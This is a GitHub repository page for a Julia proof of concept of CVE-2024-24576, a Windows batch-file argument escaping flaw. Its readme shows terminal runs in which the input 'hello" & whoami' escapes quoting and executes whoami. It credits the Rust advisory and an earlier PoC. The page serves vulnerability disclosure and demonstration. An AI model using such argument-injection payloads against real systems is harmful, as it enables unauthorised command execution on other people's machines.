CVE-2024-24576 PoC in Julia

λ julia main.jl                                  
Enter arguments:                                 
hello                                            
Output:                                          
Argument received: hello

λ julia main.jl                                  
Enter arguments:                                 
hello & whoami                                   
Output:                                          
Argument received: "hello & whoami"

λ julia main.jl                                  
Enter arguments:                                 
hello" & whoami                                  
Output:                                          
Argument received: "hello\"                      
desktop-9zk7mal\lpn

Note the escaped argument with the " & whoami

THIS IS NOT MY FINDING!

Sources:
https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/

Based on https://github.com/frostb1ten/CVE-2024-24576-PoC

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
main.jl		main.jl
readme.md		readme.md
test.bat		test.bat

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-24576 PoC in Julia

About

Releases

Packages

Languages

lpn/CVE-2024-24576.jl

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-24576 PoC in Julia

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages